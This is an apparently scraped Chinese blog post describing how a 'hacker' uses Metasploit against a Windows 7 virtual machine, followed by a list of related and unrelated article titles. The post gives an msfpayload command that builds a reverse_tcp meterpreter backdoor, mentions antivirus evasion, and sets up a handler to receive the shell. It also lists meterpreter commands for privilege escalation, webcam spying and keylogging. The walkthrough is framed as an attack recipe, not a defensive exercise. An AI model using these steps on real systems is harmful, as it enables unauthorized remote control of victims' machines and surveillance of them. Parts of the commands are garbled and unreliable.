Metasploit进行渗透windows7
来源:互联网 发布:排山掌诀推算法 编辑:程序博客网 时间:2024/05/21 21:54
没有测试---先行记录
很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。
设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。
方法步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。
sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x >steup.exe
方法步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。
进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
方法步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。
打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
方法步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。
方法步骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。
Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。
另外,附meterpreter常用命令:
getsystem #会自动利用各种各样的系统漏洞来进行权限提升
migrate #进程id进程迁移
background #把当前的会话设置为背景,需要的时候在启用
getuid #查看对方正在运行的用户
ps #列出所有的进程
getpid #返回运行meterpreter的id号
sysinfo #产看系统信息和体系结构
shell #切换到cmd的系统权限方式
exit #退出shell会话返回meterpreter或终止meterpreter
getdesktop 截取目标主机当前桌面会话窗口
run webcam -p /var/www #在/var/www目录监控目标主机的摄像头
keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
阅读全文
0 0
- Metasploit进行渗透windows7
- 内网中使用metasploit进行渗透测试
- 使用metasploit进行渗透攻击步骤
- Metasploit渗透
- metasploit对IE浏览器的极光漏洞进行渗透利用
- Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
- Metasploit渗透工具介绍
- Metasploit渗透测试指南
- metasploit常用渗透命令
- Metasploit portfwd跳板渗透
- Metasploit渗透测试指南
- metasploit 首次渗透测试
- Metasploit渗透学习日记
- metasploit渗透测试笔记
- metasploit之客户端渗透
- Metasploit渗透测试【进阶】
- metasploit渗透测试
- metasploit渗透第一篇
- jdk 安装出错,java -version 或java 可以运行,但是javac不行
- 【三】、使用循迹传感器和超声波驱动二轮差分底盘
- android sdk manager获取更新版本问题
- hdu 1016 Prime Ring Problem dfs深搜算法
- 移动设备上“精灵图”的制作
- Metasploit进行渗透windows7
- 单片机学习概览
- 华为部门宣讲会后感及求职的一点体会
- datastage status code的含义
- 设计模式之单例模式(Singleton)
- gdb调试命令
- Java获取当前格式化日期
- Problem 802: 递增数列
- 给刚买电脑啥都不懂的妹纸的应用清单